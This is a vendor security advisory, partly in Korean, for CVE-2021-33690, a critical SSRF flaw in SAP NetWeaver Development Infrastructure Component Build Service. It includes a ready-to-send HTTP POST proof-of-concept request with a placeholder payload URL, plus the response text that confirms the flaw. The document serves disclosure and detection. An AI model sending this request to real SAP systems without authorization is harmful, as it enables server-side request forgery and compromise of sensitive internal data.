
[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure
[CVE-2021-33690] SAP NetWeaver Development Infrastructure의 서버 측 요청 위조(SSRF) 취약점
Application: SAP NetWeaver AS Java
Versions Affected: SAP NetWeaver Development Infrastructure Component Build Service versions – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
Vendor URL: https://sap.com/
Bug: SSRF
Date of Public Advisory: June 1, 2023
Reference: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
SAP Note: 3072955
SAP Approved Fixes: True
Status: analyzed and published
권고 정보 제목: [CVE-2021-33690] SAP NetWeaver Development Infrastructure의 서버 측 요청 위조(SSRF) 취약점 위험도: 심각 권고 URL: https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/ 게시일: 2023년 6월 1일
취약점 정보 원격 악용 가능: 예 로컬 악용 가능: 아니오
CVSS 정보 CVSS v3.1 기본 점수: 9.9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
취약점 설명 SAP NetWeaver Development Infrastructure Component Build Service의 여러 버전(7.11, 7.20, 7.30, 7.31, 7.40, 7.50)에서 서버 측 요청 위조(SSRF)로 알려진 취약점이 확인되었습니다. 이 SAP NetWeaver Development Infrastructure Component Build Service 내의 약점은 서버 접근 권한을 가진 공격자가 특별히 조작된 질의를 통해 프록시 공격을 실행할 수 있게 합니다. 이러한 공격의 결과는 민감한 서버 데이터의 완전한 손상으로 이어져 접근성에 영향을 미칠 수 있습니다. 이 취약점의 심각도는 SAP NetWeaver Development Infrastructure(NWDI)가 인트라넷에서 운영되는지 인터넷에서 운영되는지에 따라 달라짐에 유의해야 합니다. CVSS 점수는 최악의 상황(온라인에서 작동한다고 가정)을 기준으로 산출되었습니다.
기술 설명
서버가 SSRF에 취약한지 확인하려면 다음 요청을 전송하십시오:
POST /tc.CBS.Appl/tcspseudo HTTP/1.1 Host: redrayssap:50000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Content-Type: application/x-www-form-urlencoded
CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE
다음 응답이 수신되면 취약점이 존재함을 의미합니다:
Could not connect to the CBS.RedRays 소개 RedRays는 내부 부정 행위 및 외부 사이버 위협으로부터 ERP 시스템을 보호하는 최고 수준의 사이버 보안 기업입니다. 당사는 SAP, Oracle, Microsoft 등 주요 ERP 시스템에 의존하는 대기업 및 관리형 서비스 제공업체를 위해 강력한 보안 솔루션을 제공하는 데 자부심을 가지고 있습니다. 고급 도구와 전략을 활용하여 전 세계 대규모 SAP 환경의 보안을 사전에 감독하고 통제합니다.
당사의 주요 목표는 기술적 및 비즈니스 관점에서 보안 격차를 해소하여 고객의 원활한 운영을 보장하고 소중한 데이터를 보호하는 것입니다. RedRays는 탁월한 고객 서비스와 지원을 제공하면서 최고 수준의 보안 기준을 유지하기 위해 최선을 다하고 있습니다.
RedRays R&D 소개 RedRays 성과의 초석은 주요 기업 애플리케이션의 취약점 연구 및 분석에 특화된 연구개발(R&D) 부서에 있습니다. 당사의 R&D 이니셔티브는 SAP, Oracle, Microsoft Dynamics, IBM과 같은 선도적인 소프트웨어 기업들로부터 인정과 찬사를 받았습니다. 이러한 연구에 대한 헌신은 당사가 새로운 위협을 예측하고 고객의 요구에 맞는 맞춤형 보안 솔루션을 개발할 수 있게 합니다.
당사 팀은 취약점 평가, 침투 테스트, 사고 관리, 위협 인텔리전스 등 다양한 보안 영역에 걸친 다양한 기술을 갖춘 노련한 전문가들로 구성되어 있습니다. 당사는 엄격한 연구를 수행하고 끊임없이 변화하는 위협으로부터 SAP 시스템을 강화하기 위한 최첨단 솔루션을 제공하기 위해 노력하고 있습니다.
문의 사항이나 자세한 내용이 있으시면 언제든지 연락 주시기 바랍니다: